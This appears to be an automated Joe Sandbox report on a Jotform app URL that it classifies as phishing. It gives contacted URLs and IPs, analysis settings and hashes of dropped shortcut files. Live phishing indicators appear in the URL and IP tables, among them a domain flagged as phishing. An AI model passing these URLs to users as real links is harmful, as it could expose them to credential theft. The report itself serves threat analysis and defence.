                                                                                                                                                                                https://cdn.jotfor.ms/fonts/circular/fonts/Circular-BlackItalic.woff2)chromecache_275.1.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Italic.woff)chromecache_239.1.dr, chromecache_275.1.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://southcentralusr-notifyp.svc.ms/api/v2/tracking/method/Click?mi=QqZI7lAkKE-xAVeF-uoYeg&ru=httchromecache_199.1.dr, chromecache_217.1.dr, chromecache_212.1.dr, d748e2e7-fd2f-4c10-9378-9ee3b269a691.tmp.0.dr, DOWNLOAD GITTENS MURRAYS ARCHITECTS.678101120618b4.41192529.pdf.crdownload.0.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://cdn.jotfor.ms/resources/assets/icon/min/jotform-logomark-white-400x400.pngchromecache_201.1.dr, chromecache_213.1.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://cdn.jotfor.ms/fonts/circular/fonts/Circular-BlackItalic.woff)chromecache_275.1.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://cdn.jotfor.ms/fonts/circular/fonts/Circular-MediumItalic.woff)chromecache_275.1.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://www.xfa.org/schema/xci/chromecache_200.1.dr, chromecache_251.1.drfalse
                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                            unknown
                                                                                                                                                                                            http://www.xfa.org/schema/xfa-connection-set/chromecache_200.1.dr, chromecache_251.1.drfalse
                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Black.woff2)chromecache_275.1.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://www.xfa.org/schema/xdc/chromecache_200.1.dr, chromecache_251.1.drfalse
                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://cdn.jotfor.ms/assets/img/logo2021/jotform_portal_logo_icon400x400-dark.pngchromecache_201.1.dr, chromecache_213.1.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://cdn.jotfor.ms/assets/img/portal/pickerItemFallbackImg.pngchromecache_201.1.dr, chromecache_213.1.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Thin.woff)chromecache_275.1.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://cdn.jotfor.ms/assets/img/portal/pickerItemDefaultB21.pngchromecache_201.1.dr, chromecache_213.1.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://cdn02.jotfor.mschromecache_188.1.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://cdn.jotfor.ms/fonts/circular/fonts/Circular-BookItalic.woff2)chromecache_275.1.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Book.woff)chromecache_239.1.dr, chromecache_275.1.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://www.jotform.com/oembed/?format=json&url=https%3A%2F%2Fwww.jotform.com%2Fapp%2F25009270452134chromecache_188.1.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://login.windows-ppe.netchromecache_206.1.dr, chromecache_184.1.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                http://www.xfa.org/schema/xfa-template/chromecache_200.1.dr, chromecache_251.1.drfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://login.microsoftonline.comchromecache_206.1.dr, chromecache_184.1.drfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://cdn.jotfor.ms/assets/img/portal/mobileViewDefaultBgB21.pngchromecache_201.1.dr, chromecache_213.1.drfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Light.woff2)chromecache_275.1.drfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://github.com/floating-ui/react-popper/issues/364chromecache_201.1.dr, chromecache_213.1.drfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Medium.woffchromecache_201.1.dr, chromecache_213.1.drfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://www.jotform.comchromecache_188.1.drfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://cdn01.jotfor.ms/s/vendor/staticchromecache_188.1.drfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://eu.jotform.com/uploads/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.pchromecache_188.1.drfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://cdn.jotfor.ms/assets/img/cardforms/feedbackButton.svgchromecache_201.1.dr, chromecache_213.1.drfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://cdn.jotfor.ms/fonts/circular/fonts/Circular-MediumItalic.woff2)chromecache_275.1.drfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://dm9h.zomivane.ru/oIZnEw3n/)chromecache_199.1.dr, chromecache_217.1.dr, chromecache_212.1.dr, d748e2e7-fd2f-4c10-9378-9ee3b269a691.tmp.0.dr, DOWNLOAD GITTENS MURRAYS ARCHITECTS.678101120618b4.41192529.pdf.crdownload.0.drfalse
                                                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      https://cdn.jotfor.ms/fonts/circular/fonts/Circular-ThinItalic.woff2)chromecache_275.1.drfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        http://www.xfa.org/schema/xfa-data/1.0/chromecache_200.1.dr, chromecache_251.1.drfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          https://cdn.jotfor.ms/fonts/circular/fonts/Circular-LightItalic.woff)chromecache_275.1.drfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                            142.250.186.68
                                                                                                                                                                                                                                            www.google.comUnited States
                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                            104.19.129.105
                                                                                                                                                                                                                                            events.jotform.comUnited States
                                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                            104.18.94.41
                                                                                                                                                                                                                                            challenges.cloudflare.comUnited States
                                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                            34.107.251.125
                                                                                                                                                                                                                                            eu-files.jotform.comUnited States
                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                            151.101.130.137
                                                                                                                                                                                                                                            code.jquery.comUnited States
                                                                                                                                                                                                                                            54113FASTLYUSfalse
                                                                                                                                                                                                                                            104.19.128.105
                                                                                                                                                                                                                                            eu.jotform.comUnited States
                                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                            104.21.96.1
                                                                                                                                                                                                                                            dm9h.zomivane.ruUnited States
                                                                                                                                                                                                                                            13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                            35.190.80.1
                                                                                                                                                                                                                                            a.nel.cloudflare.comUnited States
                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                            104.22.73.81
                                                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                            104.17.24.14
                                                                                                                                                                                                                                            cdnjs.cloudflare.comUnited States
                                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                            13.107.253.45
                                                                                                                                                                                                                                            s-part-0017.t-0009.fb-t-msedge.netUnited States
                                                                                                                                                                                                                                            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                            104.18.95.41
                                                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                            172.67.7.107
                                                                                                                                                                                                                                            cdn.jotfor.msUnited States
                                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                            151.101.2.137
                                                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                                                            54113FASTLYUSfalse
                                                                                                                                                                                                                                            239.255.255.250
                                                                                                                                                                                                                                            unknownReserved
                                                                                                                                                                                                                                            unknownunknownfalse
                                                                                                                                                                                                                                            188.114.97.3
                                                                                                                                                                                                                                            unknownEuropean Union
                                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                            188.114.96.3
                                                                                                                                                                                                                                            sh81xdbszq0gozj9jyxyzajxmxsyl2omho07oxsdwphufgugjbwcyyem.deryposi.ruEuropean Union
                                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                            34.120.195.249
                                                                                                                                                                                                                                            o61806.ingest.sentry.ioUnited States
                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                            104.22.72.81
                                                                                                                                                                                                                                            cdn01.jotfor.msUnited States
                                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                            IP
                                                                                                                                                                                                                                            192.168.2.17
                                                                                                                                                                                                                                            192.168.2.16
                                                                                                                                                                                                                                            192.168.2.4
                                                                                                                                                                                                                                            192.168.2.23
                                                                                                                                                                                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                                                            Analysis ID:1587498
                                                                                                                                                                                                                                            Start date and time:2025-01-10 13:35:21 +01:00
                                                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                            Overall analysis duration:0h 4m 36s
                                                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                                                            Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                                                                                            Sample URL:https://eu.jotform.com/app/250092704521347
                                                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                            Number of analysed new started processes analysed:21
                                                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                                                            Classification:mal60.phis.win@36/218@84/23
                                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, TextInputHost.exe, svchost.exe
                                                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 142.250.185.227, 142.250.186.78, 64.233.166.84, 142.250.184.206, 142.250.186.46, 192.229.221.95, 199.232.210.172, 172.217.16.206, 172.217.18.14, 142.250.181.238, 20.190.159.64, 20.190.159.2, 20.190.159.75, 20.190.159.68, 40.126.31.71, 40.126.31.67, 20.190.159.71, 20.190.159.73, 13.107.6.156, 142.250.185.206, 142.250.185.99, 142.250.185.174, 142.250.186.106, 142.250.186.138, 216.58.206.42, 142.250.186.170, 142.250.186.74, 142.250.181.234, 142.250.185.106, 172.217.16.202, 142.250.184.202, 142.250.185.170, 142.250.184.234, 172.217.18.10, 142.250.185.202, 142.250.185.138, 142.250.74.202, 142.250.185.234, 52.178.17.3, 142.250.185.142, 13.69.116.104, 199.232.214.172, 2.23.246.101, 172.217.16.142, 142.250.186.174, 20.190.159.4, 40.126.31.73, 172.217.18.106, 142.250.186.42, 142.250.185.74, 216.58.206.74, 52.167.30.171, 2.16.168.113, 2.16.168.115, 20.189.173.17, 20.42.65.88, 172.202.163.200, 184.28.90.27, 13.107.246.45, 13.107.246.60, 40.126.32.72, 20.190.160.14, 20.190.160.20
                                                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): greenid-prod-pme.eastus2.cloudapp.azure.com, azurefd-t-fb-prod.trafficmanager.net, lgincdnmsftuswe2.azureedge.net, pme-greenid-prod.trafficmanager.net, slscr.update.microsoft.com, onedscolprdwus22.westus.cloudapp.azure.com, e13678.dscb.akamaiedge.net, clientservices.googleapis.com, browser.events.data.trafficmanager.net, ak.privatelink.msidentity.com, www.microsoft.com-c-3.edgekey.net, clients2.google.com, ocsp.digicert.com, login.live.com, update.googleapis.com, acctcdnvzeuno.azureedge.net, acctcdnvzeuno.ec.azureedge.net, www.bing.com, onedscolprdweu06.westeurope.cloudapp.azure.com, fpt2.microsoft.com, fs.microsoft.com, acctcdnmsftuswe2.azureedge.net, content-autofill.googleapis.com, aadcdnoriginwus2.azureedge.net, lgincdnvzeuno.ec.azureedge.net, aadcdn.msauth.net, eu.events.data.trafficmanager.net, edgedl.me.gvt1.com, nel.measure.office.net.edgesuite.net, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com, fpt.microsoft.com, eu-mobile.events.data.microsoft
                                                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                            • VT rate limit hit for: https://eu.jotform.com/app/250092704521347
                                                                                                                                                                                                                                            No simulations
                                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 11:35:54 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2677
                                                                                                                                                                                                                                            Entropy (8bit):3.990245162617638
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:820d1Te77suHsidAKZdA1JehwiZUklqehQy+3:82ywKvy
                                                                                                                                                                                                                                            MD5:4B3FD68C920EFF7B4A8F80FC44CC3209
                                                                                                                                                                                                                                            SHA1:254CFA26C50CEFDF0B435D976F21071170233297
                                                                                                                                                                                                                                            SHA-256:FA6BF189BA346BE1987D36CAAD9230568AACB87BF56698306AEB98BEB273849A
                                                                                                                                                                                                                                            SHA-512:88703566671C1B1A1A8F0E0C9760B65FB8013DEC83BE7BC34B896D2409110BF3C8B6AF972E7D6EE1834A4A43286932F38240DEA6FCCDA26DA158B0202A36BCE4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:L..................F.@.. ...$+.,.....".0\c......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I*Zrd....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Zzd....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V*Zzd....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V*Zzd...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V*Z|d...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........1........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 11:35:54 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2679
                                                                                                                                                                                                                                            Entropy (8bit):4.002589363761457
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:8x0d1Te77suHsidAKZdA10eh/iZUkAQkqehfy+2:8xywQ9QWy
                                                                                                                                                                                                                                            MD5:3C9664854F9528CC591353302BAA1675
                                                                                                                                                                                                                                            SHA1:77416E59CA87FABE1B52CD3EACD6F2C9A279C36E
                                                                                                                                                                                                                                            SHA-256:1FB139EFC138804C283257FE73E9773D03CAAC6832BCCCD242D9C26FD331F519
                                                                                                                                                                                                                                            SHA-512:969404EF0B40EDBC8AA0837BF1C76151D3E3222558EEBC49E348D18ADA9ABDEC30B63D306DD2B43BD59235FCBDF86608F588CF281681ABC7850968E69EA6A06D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:L..................F.@.. ...$+.,....L?.0\c......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I*Zrd....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Zzd....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V*Zzd....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V*Zzd...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V*Z|d...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........1........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2693
                                                                                                                                                                                                                                            Entropy (8bit):4.016564264133141
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:8e0d1Te77jHsidAKZdA14tIeh7sFiZUkmgqeh7sVy+BX:8eywQnjy
                                                                                                                                                                                                                                            MD5:1AEF194AE66124E4AEB21F85A26CF226
                                                                                                                                                                                                                                            SHA1:3AEB27AE9A5F29F5570CD2E239B58D7C8837BB3E
                                                                                                                                                                                                                                            SHA-256:BB621F6EE59AE447F313C20A93E7C76860A0C548D47E6F68F944FB3FBCDD7B05
                                                                                                                                                                                                                                            SHA-512:444DB7C2AE942CAB4EA15FDBEF11E93746B01377E444DB9A6BEBA0063EE654575967CF581DB5EA886DC797F2EC83A33D18C5CCA72F5AB3C9107B96B19263F41F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I*Zrd....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Zzd....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V*Zzd....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V*Zzd...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........1........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 11:35:54 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2681
                                                                                                                                                                                                                                            Entropy (8bit):4.005156189177383
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:840d1Te77suHsidAKZdA1behDiZUkwqehLy+R:84ywLdy
                                                                                                                                                                                                                                            MD5:02CBC98B03269B269B72D9F477ED52F4
                                                                                                                                                                                                                                            SHA1:A4E39F1B5DB3BBF288CCF20A103E92385A23F7C1
                                                                                                                                                                                                                                            SHA-256:C66185DEA13937C61CE75FF62E869891A23FCA02608237A7C7B72CC86A63175C
                                                                                                                                                                                                                                            SHA-512:9F7D1D03F0826AD65AC19D3866E388B59098D6F618230BFFD9A864BBD8B55E02DDD64ED7BC2339EAEBC5C05B9D580F3FA9318D51B67DB51585048702E8B344F6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:L..................F.@.. ...$+.,.....$.0\c......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I*Zrd....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Zzd....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V*Zzd....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V*Zzd...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V*Z|d...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........1........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 11:35:54 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2681
                                                                                                                                                                                                                                            Entropy (8bit):3.9902181662001155
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:83I0d1Te77suHsidAKZdA1VehBiZUk1W1qehJy+C:8YywL9py
                                                                                                                                                                                                                                            MD5:3E075D3DE3C394CE90F087C912ED2895
                                                                                                                                                                                                                                            SHA1:01EB8D95B585BD52FC1C7A5E7F324D4A1508935D
                                                                                                                                                                                                                                            SHA-256:244D783C85ECA404DBCC099C7CDCAC03633388BB242074289635D89C0D82BA76
                                                                                                                                                                                                                                            SHA-512:002655FFE757900ED0DFCB58D169ECF65413DCAF02B4C8425031D0E43F7E8834EB8B073201D8A0597D5F5E50872406ED577C5D5428861A79095F2E99BA15478D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:L..................F.@.. ...$+.,....O..0\c......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I*Zrd....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Zzd....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V*Zzd....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V*Zzd...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V*Z|d...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........1........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 11:35:54 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2683
                                                                                                                                                                                                                                            Entropy (8bit):4.001938809537597
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:8y0d1Te77suHsidAKZdA1duT6ehOuTbbiZUk5OjqehOuTbjy+yT+:8yywXTTTbxWOvTbjy7T
                                                                                                                                                                                                                                            MD5:721A8BC82D9AB0D42784E18FFDCA0412
                                                                                                                                                                                                                                            SHA1:BB99069B31B574F51DBF912B5DDE9D05BA28E32E
                                                                                                                                                                                                                                            SHA-256:CD8FE65CE4C7D5EA73EA62163F2452014AD5A98276440C99FBCFA0CE230C7626
                                                                                                                                                                                                                                            SHA-512:449F532C5E2A4A1426D4410DFB819AFF6058D6D41B3FB7DF6BB6BED22F267B645B3E52AB488E40568FA8835A9DAC9E233FD5599837E28DD8C2488695B353145B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
